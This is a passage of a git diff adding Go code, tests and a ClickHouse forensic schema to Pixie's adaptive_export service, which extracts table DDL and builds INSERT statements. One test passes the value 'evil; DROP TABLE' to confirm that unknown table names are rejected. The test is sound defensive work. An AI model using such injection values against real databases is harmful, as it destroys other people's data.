+ }
+}
+
+// TestOperatorOwnedTables_TrailingOperatorTables — ordering guard.
+// pixie observation tables come first (so they exist before the retention
+// plugin can auto-DDL them with the wrong schema), then the operator's
+// own write targets in declared order.
+func TestOperatorOwnedTables_TrailingOperatorTables(t *testing.T) {
+ want := []string{"adaptive_attribution", "trigger_watermark", "ae_reconcile", "dx_attack_graph", "dx_attack_graph_malicious"}
+ got := OperatorOwnedTables[len(OperatorOwnedTables)-len(want):]
+ for i, w := range want {
+ if got[i] != w {
+ t.Fatalf("OperatorOwnedTables tail = %v, want %v", got, want)
+ }
+ }
+}
+
+// TestOperatorOwnedTables_CoversAllPixieTables — drift guard between the
+// boot-time Apply (OperatorOwnedTables, this file) and the verify path
+// that uses ddl.go's KnownTables / PixieTables. aeprod3/4/5 shipped with
+// the two lists out of sync: ddl.go's PixieTables() included "conn_stats"
+// (re-added in commit a54a1f6d3) but OperatorOwnedTables
+// did not, so Apply created 14 tables and Verify expected 15 — AE fatal'd
+// at boot with `pixie table schema drift detected … conn_stats schema
+// drift, missing columns`. Anyone adding a new pixie observation table in
+// the future MUST add it to both lists; this test fails loudly otherwise.
+func TestOperatorOwnedTables_CoversAllPixieTables(t *testing.T) {
+ owned := map[string]bool{}
+ for _, n := range OperatorOwnedTables {
+ owned[n] = true
+ }
+ var missing []string
+ for _, p := range PixieTables() {
+ if !owned[p] {
+ missing = append(missing, p)
+ }
+ }
+ if len(missing) > 0 {
+ t.Fatalf("PixieTables() not covered by OperatorOwnedTables: %v "+
+ "(adding a pixie table requires updating BOTH apply.go OperatorOwnedTables "+
+ "and ddl.go KnownTables+PixieTables — drift causes the boot-time schema "+
+ "verify to fail with \"missing columns\")", missing)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/columns_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/columns_test.go
new file mode 100644
index 00000000000..2e3a94bfb73
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/columns_test.go
@@ -0,0 +1,130 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package clickhouse
+
+import (
+ "reflect"
+ "strings"
+ "testing"
+)
+
+// http_events is the shape AE writes most often (and the bench shape).
+// Pin the exact ordered column list so a schema.sql edit that drops or
+// reorders a column trips this test loudly.
+func TestColumns_http_events_ExactList(t *testing.T) {
+ got, err := Columns("http_events")
+ if err != nil {
+ t.Fatalf("Columns: %v", err)
+ }
+ want := []string{
+ "time_", "upid", "namespace", "pod",
+ "remote_addr", "remote_port", "local_addr", "local_port",
+ "trace_role", "encrypted", "major_version", "minor_version",
+ "content_type", "req_headers", "req_method", "req_path",
+ "req_body", "req_body_size", "resp_headers", "resp_status",
+ "resp_message", "resp_body", "resp_body_size", "latency",
+ "hostname", "event_time",
+ }
+ if !reflect.DeepEqual(got, want) {
+ t.Fatalf("Columns(http_events) mismatch:\n got=%v\nwant=%v", got, want)
+ }
+}
+
+// conn_stats is the column shape pinned by the rev-2 schema; if anyone
+// drops or renames a column the bench-encoder fast-path would silently
+// emit the wrong JSON, so this guard is mandatory.
+func TestColumns_conn_stats_ExactList(t *testing.T) {
+ got, err := Columns("conn_stats")
+ if err != nil {
+ t.Fatalf("Columns: %v", err)
+ }
+ want := []string{
+ "time_", "upid", "namespace", "pod",
+ "remote_addr", "remote_port", "trace_role", "addr_family",
+ "protocol", "ssl", "conn_open", "conn_close", "conn_active",
+ "bytes_sent", "bytes_recv", "hostname", "event_time",
+ }
+ if !reflect.DeepEqual(got, want) {
+ t.Fatalf("Columns(conn_stats) mismatch:\n got=%v\nwant=%v", got, want)
+ }
+}
+
+// Every table in PixieTables() must successfully parse, and each must
+// include the operator-mandated namespace + pod columns plus the
+// retention-plugin-mandated hostname + event_time columns.
+func TestColumns_AllPixieTables_HaveOperatorColumns(t *testing.T) {
+ for _, table := range PixieTables() {
+ cols, err := Columns(table)
+ if err != nil {
+ t.Errorf("Columns(%q): %v", table, err)
+ continue
+ }
+ for _, required := range []string{"namespace", "pod", "hostname", "event_time"} {
+ found := false
+ for _, c := range cols {
+ if c == required {
+ found = true
+ break
+ }
+ }
+ if !found {
+ t.Errorf("Columns(%q) missing required column %q (cols=%v)", table, required, cols)
+ }
+ }
+ }
+}
+
+// Backtick-quoted (dotted) tables also resolve.
+func TestColumns_DottedTables(t *testing.T) {
+ for _, table := range []string{"http2_messages.beta", "kafka_events.beta"} {
+ got, err := Columns(table)
+ if err != nil {
+ t.Errorf("Columns(%q): %v", table, err)
+ continue
+ }
+ if len(got) == 0 {
+ t.Errorf("Columns(%q): empty", table)
+ }
+ }
+}
+
+// Unknown tables return ErrUnknownTable so callers (sink) can fall
+// back to the encoding/json slow path safely.
+func TestColumns_UnknownTable_ErrUnknownTable(t *testing.T) {
+ _, err := Columns("not_a_real_table")
+ if err == nil || !strings.Contains(err.Error(), "unknown table") {
+ t.Fatalf("expected ErrUnknownTable for unknown table, got %v", err)
+ }
+}
+
+// Repeated lookups for the same table return the same content. (The
+// underlying parser may or may not cache — the sink's fast-path
+// encoder caches the column slice itself once per table; what we test
+// here is that the public Columns() answer is stable.)
+func TestColumns_Repeated_StableResult(t *testing.T) {
+ a, err := Columns("dns_events")
+ if err != nil {
+ t.Fatal(err)
+ }
+ b, err := Columns("dns_events")
+ if err != nil {
+ t.Fatal(err)
+ }
+ if !reflect.DeepEqual(a, b) {
+ t.Fatalf("Columns(dns_events) drift across calls: a=%v b=%v", a, b)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go
new file mode 100644
index 00000000000..e4503bb340c
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go
@@ -0,0 +1,137 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package clickhouse owns the canonical ClickHouse DDL for the
+// forensic_db tables that adaptive_export reads (kubescape_logs) and
+// the 12 socket_tracer tables Pixie's retention plugin writes (which
+// the operator joins against via forensic_db.adaptive_attribution).
+//
+// schema.sql is the single source of truth. The operator never invents
+// SQL — it always extracts statements verbatim from the embedded copy.
+package clickhouse
+
+import (
+ _ "embed"
+ "errors"
+ "fmt"
+ "strings"
+)
+
+//go:embed schema.sql
+var canonicalSchema string
+
+// KnownTables enumerates every forensic_db table the operator is aware
+// of, in the order they appear in schema.sql. Backtick-quoted table
+// names (those containing dots, e.g. "http2_messages.beta") are listed
+// here without backticks; DDL() reinjects them.
+var KnownTables = []string{
+ // non-pixie
+ "alerts",
+ "kubescape_logs",
+ // 12 socket_tracer pixie observation tables
+ "http_events",
+ "http2_messages.beta",
+ "dns_events",
+ "redis_events",
+ "mysql_events",
+ "pgsql_events",
+ "cql_events",
+ "mongodb_events",
+ "kafka_events.beta",
+ "amqp_events",
+ "mux_events",
+ "tls_events",
+ // conn_stats — re-added to rev-2 schema; counts per
+ // (remote_addr, remote_port, protocol) on each retention-script pull.
+ "conn_stats",
+ // operator-owned attribution table
+ "adaptive_attribution",
+ // operator-owned persistent trigger cursor
+ "trigger_watermark",
+ // operator-owned per-pull write-fidelity instrument (ADAPTIVE_RECONCILE).
+ // NOT a pixie table — absent from PixieTables().
+ "ae_reconcile",
+ // operator-owned dx evidence-graph edge list (read by the Pixie
+ // dx_evidence_graph UI via clickhouse_dsn). NOT a pixie table.
+ "dx_attack_graph",
+ // rule-ins-only VIEW over dx_attack_graph (condition != ''); the
+ // dx_evidence_graph UI reads this by default so benign rows are filtered
+ // in ClickHouse, not pulled. Must follow dx_attack_graph (depends on it).
+ "dx_attack_graph_malicious",
+}
+
+// ErrUnknownTable is returned by DDL / Columns when asked for a table
+// not in KnownTables.
+var ErrUnknownTable = errors.New("clickhouse: unknown table")
+
+// DDL returns the canonical CREATE TABLE statement for the named table,
+// extracted from the embedded schema.sql.
+func DDL(table string) (string, error) {
+ if !isKnown(table) {
+ return "", fmt.Errorf("%w: %q", ErrUnknownTable, table)
+ }
+ // ClickHouse identifiers containing a dot must be backtick-quoted.
+ // Build the right header for the lookup.
+ identifier := table
+ if strings.Contains(table, ".") {
+ identifier = "`" + table + "`"
+ }
+ start := -1
+ for _, kw := range []string{"CREATE TABLE IF NOT EXISTS forensic_db.", "CREATE VIEW IF NOT EXISTS forensic_db."} {
+ if start = strings.Index(canonicalSchema, kw+identifier); start >= 0 {
+ break
+ }
+ }
+ if start < 0 {
+ return "", fmt.Errorf("%w: %q registered in KnownTables but not present in embedded schema.sql", ErrUnknownTable, table)
+ }
+ rest := canonicalSchema[start:]
+ semi := strings.Index(rest, ";")
+ if semi < 0 {
+ return "", fmt.Errorf("malformed schema.sql: no terminating ';' after %q", table)
+ }
+ return rest[:semi+1], nil
+}
+
+// PixieTables returns the subset of KnownTables that are pixie
+// socket_tracer observation tables (the JOIN targets for
+// adaptive_attribution).
+func PixieTables() []string {
+ return []string{
+ "http_events",
+ "http2_messages.beta",
+ "dns_events",
+ "redis_events",
+ "mysql_events",
+ "pgsql_events",
+ "cql_events",
+ "mongodb_events",
+ "kafka_events.beta",
+ "amqp_events",
+ "mux_events",
+ "tls_events",
+ "conn_stats",
+ }
+}
+
+func isKnown(name string) bool {
+ for _, t := range KnownTables {
+ if t == name {
+ return true
+ }
+ }
+ return false
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go
new file mode 100644
index 00000000000..0da8c706d3d
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go
@@ -0,0 +1,143 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package clickhouse
+
+import (
+ "errors"
+ "strings"
+ "testing"
+)
+
+// TestDDL_ReturnsCanonicalForKnownTables — every table named in
+// KnownTables can be extracted as a complete CREATE TABLE statement.
+func TestDDL_ReturnsCanonicalForKnownTables(t *testing.T) {
+ for _, name := range KnownTables {
+ t.Run(name, func(t *testing.T) {
+ ddl, err := DDL(name)
+ if err != nil {
+ t.Fatalf("DDL(%q): %v", name, err)
+ }
+ if !strings.HasPrefix(ddl, "CREATE TABLE IF NOT EXISTS forensic_db.") &&
+ !strings.HasPrefix(ddl, "CREATE VIEW IF NOT EXISTS forensic_db.") {
+ t.Fatalf("DDL(%q) wrong prefix: %q", name, ddl[:minInt(70, len(ddl))])
+ }
+ if !strings.HasSuffix(ddl, ";") {
+ t.Fatalf("DDL(%q) does not terminate with ';'", name)
+ }
+ })
+ }
+}
+
+// TestDDL_PixieTablesIncludeNamespaceAndPod — every pixie table must
+// declare namespace + pod columns (used by attribution JOINs).
+func TestDDL_PixieTablesIncludeNamespaceAndPod(t *testing.T) {
+ for _, name := range PixieTables() {
+ t.Run(name, func(t *testing.T) {
+ ddl, err := DDL(name)
+ if err != nil {
+ t.Fatalf("DDL(%q): %v", name, err)
+ }
+ if !strings.Contains(ddl, "namespace") {
+ t.Fatalf("%s missing namespace column", name)
+ }
+ if !strings.Contains(ddl, "pod") {
+ t.Fatalf("%s missing pod column", name)
+ }
+ })
+ }
+}
+
+// TestDDL_PixieTables_NoAnomalyHashColumn — pixie observation tables
+// MUST NOT carry the hash inline; attribution is via JOIN.
+func TestDDL_PixieTables_NoAnomalyHashColumn(t *testing.T) {
+ for _, name := range PixieTables() {
+ t.Run(name, func(t *testing.T) {
+ ddl, err := DDL(name)
+ if err != nil {
+ t.Fatalf("DDL(%q): %v", name, err)
+ }
+ if strings.Contains(ddl, "anomaly_hash") || strings.Contains(ddl, "anomaly_hashes") {
+ t.Fatalf("pixie table %q must not carry anomaly_hash column; got:\n%s", name, ddl)
+ }
+ })
+ }
+}
+
+// TestDDL_AdaptiveAttribution_HasExpectedColumns — the attribution
+// table is the operator's only write target.
+func TestDDL_AdaptiveAttribution_HasExpectedColumns(t *testing.T) {
+ ddl, err := DDL("adaptive_attribution")
+ if err != nil {
+ t.Fatalf("DDL: %v", err)
+ }
+ for _, c := range []string{
+ "anomaly_hash", "namespace", "pod", "comm", "pid",
+ "hostname", "t_start", "t_end", "last_seen",
+ } {
+ if !strings.Contains(ddl, c) {
+ t.Fatalf("adaptive_attribution missing column %q; got:\n%s", c, ddl)
+ }
+ }
+ if !strings.Contains(ddl, "ReplacingMergeTree(t_end)") {
+ t.Fatalf("adaptive_attribution must use ReplacingMergeTree(t_end); got:\n%s", ddl)
+ }
+}
+
+// TestDDL_KubescapeLogs_PreservesAnomalyHash — kubescape_logs keeps its
+// existing anomaly_hash DEFAULT ” column for pipeline compat.
+func TestDDL_KubescapeLogs_PreservesAnomalyHash(t *testing.T) {
+ ddl, err := DDL("kubescape_logs")
+ if err != nil {
+ t.Fatalf("DDL: %v", err)
+ }
+ if !strings.Contains(ddl, "anomaly_hash") {
+ t.Fatalf("kubescape_logs lost anomaly_hash column: %s", ddl)
+ }
+}
+
+// TestDDL_UnknownTable_ErrUnknownTable — defensive contract.
+func TestDDL_UnknownTable_ErrUnknownTable(t *testing.T) {
+ for _, bad := range []string{"", "no_such_table", "process_events"} {
+ _, err := DDL(bad)
+ if !errors.Is(err, ErrUnknownTable) {
+ t.Fatalf("DDL(%q) → %v, want ErrUnknownTable", bad, err)
+ }
+ }
+}
+
+// TestDDL_DottedTableName_BacktickQuoted — schema.sql backtick-quotes
+// dotted ClickHouse identifiers.
+func TestDDL_DottedTableName_BacktickQuoted(t *testing.T) {
+ for _, name := range []string{"http2_messages.beta", "kafka_events.beta"} {
+ t.Run(name, func(t *testing.T) {
+ ddl, err := DDL(name)
+ if err != nil {
+ t.Fatalf("DDL(%q): %v", name, err)
+ }
+ if !strings.Contains(ddl, "`"+name+"`") {
+ t.Fatalf("dotted table %q must be backtick-quoted; got:\n%s", name, ddl)
+ }
+ })
+ }
+}
+
+func minInt(a, b int) int {
+ if a < b {
+ return a
+ }
+ return b
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/insert.go b/src/vizier/services/adaptive_export/internal/clickhouse/insert.go
new file mode 100644
index 00000000000..1d76c286760
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/insert.go
@@ -0,0 +1,114 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package clickhouse
+
+import (
+ "fmt"
+ "strings"
+)
+
+// Columns returns the column names of forensic_db. in
+// declaration order, parsed from the embedded canonical schema.sql.
+// Same defensive contract as DDL: unknown table → ErrUnknownTable.
+func Columns(table string) ([]string, error) {
+ ddl, err := DDL(table)
+ if err != nil {
+ return nil, err
+ }
+ return parseColumnList(ddl)
+}
+
+// InsertSQL returns the parameterized INSERT for forensic_db.,
+// ending in "... VALUES" so a driver's batch API can append rows.
+// Column order matches Columns() exactly — callers MUST append values
+// in that same order. Dotted ClickHouse identifiers are auto-quoted
+// with backticks.
+func InsertSQL(table string) (string, error) {
+ cols, err := Columns(table)
+ if err != nil {
+ return "", err
+ }
+ identifier := table
+ if strings.Contains(table, ".") {
+ identifier = "`" + table + "`"
+ }
+ return fmt.Sprintf("INSERT INTO forensic_db.%s (%s) VALUES",
+ identifier, strings.Join(cols, ", ")), nil
+}
+
+// parseColumnList walks the body of a CREATE TABLE statement, returning
+// the leading identifier of each non-comment, non-blank line up to the
+// closing `)` that ends the column list. Defensive against the SQL
+// dialect quirks present in our schema (LowCardinality(...), DEFAULT
+// expressions, inline -- comments, multi-word types).
+func parseColumnList(ddl string) ([]string, error) {
+ open := strings.Index(ddl, "(")
+ if open < 0 {
+ return nil, fmt.Errorf("malformed DDL: no opening paren")
+ }
+ body := ddl[open+1:]
+ // the closing paren of the column list is the first `)` at the
+ // matching depth, but our schema doesn't nest parens inside the
+ // column list except inside DEFAULT exprs (e.g. now64(3)) and
+ // LowCardinality(String). Track depth.
+ depth := 1
+ end := -1
+ for i, r := range body {
+ switch r {
+ case '(':
+ depth++
+ case ')':
+ depth--
+ if depth == 0 {
+ end = i
+ }
+ }
+ if end >= 0 {
+ break
+ }
+ }
+ if end < 0 {
+ return nil, fmt.Errorf("malformed DDL: no closing paren for column list")
+ }
+ body = body[:end]
+
+ var cols []string
+ for _, raw := range strings.Split(body, "\n") {
+ line := strings.TrimSpace(raw)
+ if line == "" || strings.HasPrefix(line, "--") {
+ continue
+ }
+ // strip trailing comma + inline -- comment
+ if i := strings.Index(line, "--"); i >= 0 {
+ line = strings.TrimSpace(line[:i])
+ }
+ line = strings.TrimSuffix(line, ",")
+ if line == "" {
+ continue
+ }
+ // first whitespace-separated token = column name
+ fields := strings.Fields(line)
+ if len(fields) == 0 {
+ continue
+ }
+ cols = append(cols, fields[0])
+ }
+ if len(cols) == 0 {
+ return nil, fmt.Errorf("malformed DDL: no columns parsed")
+ }
+ return cols, nil
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go
new file mode 100644
index 00000000000..ee66a17a85d
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go
@@ -0,0 +1,109 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package clickhouse
+
+import (
+ "errors"
+ "strings"
+ "testing"
+)
+
+// TestColumns_AdaptiveAttribution — the operator's only write target.
+// Column list must match the DDL exactly so the sink can append values
+// in the right positional order.
+func TestColumns_AdaptiveAttribution(t *testing.T) {
+ cols, err := Columns("adaptive_attribution")
+ if err != nil {
+ t.Fatalf("Columns: %v", err)
+ }
+ want := []string{
+ "anomaly_hash", "namespace", "pod", "comm", "pid",
+ "hostname", "t_start", "t_end", "last_seen",
+ "last_rule_id", "n_anomalies",
+ }
+ if len(cols) != len(want) {
+ t.Fatalf("Columns(adaptive_attribution) length %d, want %d; got %v", len(cols), len(want), cols)
+ }
+ for i, c := range want {
+ if cols[i] != c {
+ t.Fatalf("col[%d] = %q, want %q (full=%v)", i, cols[i], c, cols)
+ }
+ }
+}
+
+// TestColumns_PixieTablesIncludeNamespaceAndPod — every pixie table's
+// column list contains namespace + pod (the JOIN keys against
+// adaptive_attribution).
+func TestColumns_PixieTablesIncludeNamespaceAndPod(t *testing.T) {
+ for _, table := range PixieTables() {
+ t.Run(table, func(t *testing.T) {
+ cols, err := Columns(table)
+ if err != nil {
+ t.Fatalf("Columns(%q): %v", table, err)
+ }
+ if !contains(cols, "namespace") {
+ t.Fatalf("%s missing namespace; cols=%v", table, cols)
+ }
+ if !contains(cols, "pod") {
+ t.Fatalf("%s missing pod; cols=%v", table, cols)
+ }
+ if contains(cols, "anomaly_hash") || contains(cols, "anomaly_hashes") {
+ t.Fatalf("%s must not carry hash inline; cols=%v", table, cols)
+ }
+ })
+ }
+}
+
+// TestInsertSQL_AdaptiveAttribution — the canonical INSERT used by the sink.
+func TestInsertSQL_AdaptiveAttribution(t *testing.T) {
+ sql, err := InsertSQL("adaptive_attribution")
+ if err != nil {
+ t.Fatalf("InsertSQL: %v", err)
+ }
+ if !strings.HasPrefix(sql, "INSERT INTO forensic_db.adaptive_attribution (") {
+ t.Fatalf("bad prefix: %q", sql)
+ }
+ if !strings.HasSuffix(sql, ") VALUES") {
+ t.Fatalf("bad suffix: %q", sql)
+ }
+}
+
+// TestInsertSQL_DottedTablesBacktickQuoted — INSERT statements for
+// dotted ClickHouse identifiers must wrap the name in backticks.
+func TestInsertSQL_DottedTablesBacktickQuoted(t *testing.T) {
+ for _, table := range []string{"http2_messages.beta", "kafka_events.beta"} {
+ t.Run(table, func(t *testing.T) {
+ sql, err := InsertSQL(table)
+ if err != nil {
+ t.Fatalf("InsertSQL(%q): %v", table, err)
+ }
+ if !strings.Contains(sql, "INSERT INTO forensic_db.`"+table+"` (") {
+ t.Fatalf("dotted table %q not backtick-quoted: %q", table, sql)
+ }
+ })
+ }
+}
+
+// TestInsertSQL_Unknown — defensive contract.
+func TestInsertSQL_Unknown(t *testing.T) {
+ for _, bad := range []string{"", "evil; DROP TABLE"} {
+ _, err := InsertSQL(bad)
+ if !errors.Is(err, ErrUnknownTable) {
+ t.Fatalf("InsertSQL(%q) → %v, want ErrUnknownTable", bad, err)
+ }
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/integration_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/integration_test.go
new file mode 100644
index 00000000000..d0cc78a642e
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/integration_test.go
@@ -0,0 +1,154 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+//go:build integration
+// +build integration
+
+package clickhouse_test
+
+import (
+ "context"
+ "fmt"
+ "io"
+ "net/http"
+ "net/url"
+ "os"
+ "strings"
+ "testing"
+ "time"
+
+ chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+)
+
+// Live integration tests for the operator's schema-apply path. Driven
+// against a real ClickHouse reachable at INTEGRATION_CH_ENDPOINT.
+// Skipped if the env var is unset, so `go test` (without -tags
+// integration) is unaffected.
+
+func envEndpoint(t *testing.T) string {
+ t.Helper()
+ e := os.Getenv("INTEGRATION_CH_ENDPOINT")
+ if e == "" {
+ t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test")
+ }
+ return e
+}
+
+func envCreds() (string, string) {
+ return os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD")
+}
+
+func httpExists(t *testing.T, endpoint, user, pass, table string) string {
+ t.Helper()
+ ident := table
+ if strings.Contains(table, ".") {
+ ident = "`" + table + "`"
+ }
+ q := url.Values{}
+ q.Set("query", fmt.Sprintf("EXISTS forensic_db.%s", ident))
+ req, err := http.NewRequest(http.MethodGet, strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), nil)
+ if err != nil {
+ t.Fatalf("build EXISTS req for %s: %v", table, err)
+ }
+ if user != "" {
+ req.SetBasicAuth(user, pass)
+ }
+ resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req)
+ if err != nil {
+ t.Fatalf("EXISTS %s: %v", table, err)
+ }
+ defer resp.Body.Close()
+ body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096))
+ if resp.StatusCode/100 != 2 {
+ t.Fatalf("EXISTS %s: HTTP %d: %s", table, resp.StatusCode, strings.TrimSpace(string(body)))
+ }
+ return strings.TrimSpace(string(body))
+}
+
+// TestApply_Live runs the operator's Apply() against a live ClickHouse
+// and asserts every OperatorOwnedTables entry is materialised. This is
+// the regression guard for the "tables never appear in clickhouse"
+// class of bug — a green run here proves the embedded schema.sql is
+// reachable, the DDL extractor produces valid statements, and the HTTP
+// transport posts them successfully.
+func TestApply_Live(t *testing.T) {
+ endpoint := envEndpoint(t)
+ user, pass := envCreds()
+
+ a, err := chpkg.NewApplier(endpoint, user, pass)
+ if err != nil {
+ t.Fatalf("NewApplier: %v", err)
+ }
+ ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+ defer cancel()
+ if err := a.Apply(ctx); err != nil {
+ t.Fatalf("Apply: %v", err)
+ }
+
+ // Every operator-owned table must EXIST.
+ for _, table := range chpkg.OperatorOwnedTables {
+ got := httpExists(t, endpoint, user, pass, table)
+ if got != "1" {
+ t.Errorf("table forensic_db.%s: EXISTS=%q, want 1", table, got)
+ }
+ }
+}
+
+// TestApply_Idempotent runs Apply() twice and asserts the second pass
+// is a no-op (CREATE TABLE IF NOT EXISTS semantics on every statement).
+func TestApply_Idempotent(t *testing.T) {
+ endpoint := envEndpoint(t)
+ user, pass := envCreds()
+ a, err := chpkg.NewApplier(endpoint, user, pass)
+ if err != nil {
+ t.Fatal(err)
+ }
+ // Separate contexts per Apply — sharing one 60s budget across both
+ // calls makes Apply #2 occasionally fail with context.DeadlineExceeded
+ // when the live cluster is slow, masking the idempotency property.
+ ctx1, cancel1 := context.WithTimeout(context.Background(), 60*time.Second)
+ defer cancel1()
+ if err := a.Apply(ctx1); err != nil {
+ t.Fatalf("Apply #1: %v", err)
+ }
+ ctx2, cancel2 := context.WithTimeout(context.Background(), 60*time.Second)
+ defer cancel2()
+ if err := a.Apply(ctx2); err != nil {
+ t.Fatalf("Apply #2 (should be idempotent): %v", err)
+ }
+}
+
+// TestVerifyPixieSchema_Live runs the post-Apply guard against the
+// live cluster. Required pixie columns (namespace, pod, hostname, time_)
+// must be present on every pixie observation table.
+func TestVerifyPixieSchema_Live(t *testing.T) {
+ endpoint := envEndpoint(t)
+ user, pass := envCreds()
+
+ a, err := chpkg.NewApplier(endpoint, user, pass)
+ if err != nil {
+ t.Fatal(err)
+ }
+ ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
+ defer cancel()
+ // Apply first so the test is order-independent w.r.t. TestApply_Live.
+ if err := a.Apply(ctx); err != nil {
+ t.Fatalf("Apply (precondition): %v", err)
+ }
+ if err := a.VerifyPixieSchema(ctx); err != nil {
+ t.Fatalf("VerifyPixieSchema: %v", err)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql
new file mode 100644
index 00000000000..494285b3d12
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql
@@ -0,0 +1,532 @@
+-- Forensic SOC ClickHouse schema (adaptive-write feature, design rev 2)
+-- ----------------------------------------------------------------------
+-- Pixie type map (PixieTypeToClickHouseType):
+-- TIME64NS → DateTime64(9), except event_time → DateTime64(3)
+-- INT64 → Int64 | FLOAT64 → Float64 | STRING → String
+-- BOOLEAN → UInt8 | UINT128 → String
+-- Pixie's retention plugin adds: hostname String, event_time DateTime64(3)
+-- We add: namespace String, pod String (used by adaptive_attribution JOINs).
+--
+-- Engine convention for pixie observation tables:
+-- ENGINE = MergeTree()
+-- PARTITION BY toYYYYMM(event_time)
+-- ORDER BY (hostname, event_time)
+--
+-- The hash IS NOT stored on pixie observation rows. Attribution is via JOIN
+-- against forensic_db.adaptive_attribution on (hostname, namespace, pod, time_).
+-- See the adaptive_attribution definition at the bottom of this file.
+
+CREATE DATABASE IF NOT EXISTS forensic_db;
+
+-- Kubescape alerts (Vector kubescape_to_alerts sink, unchanged).
+CREATE TABLE IF NOT EXISTS forensic_db.alerts (
+ timestamp DateTime64(3),
+ ingest_time DateTime64(3) DEFAULT now64(3),
+ rule_id LowCardinality(String),
+ alert_name LowCardinality(String),
+ severity UInt8,
+ unique_id String,
+ cluster_name LowCardinality(String),
+ namespace LowCardinality(String),
+ pod_name String,
+ container_name LowCardinality(String),
+ container_id String,
+ workload_name LowCardinality(String),
+ workload_kind LowCardinality(String),
+ image LowCardinality(String),
+ infected_pid UInt32,
+ process_name LowCardinality(String),
+ process_cmdline String,
+ message String,
+ raw_event String
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(timestamp)
+ ORDER BY (timestamp, severity, namespace, rule_id)
+ TTL toDateTime(timestamp) + INTERVAL 90 DAY DELETE
+ SETTINGS index_granularity = 8192, ttl_only_drop_parts = 1;
+
+-- Kubescape raw logs — Vector kubescape_enrich sink writes here, the operator's
+-- trigger reads it. anomaly_hash column kept here as DEFAULT '' for backwards
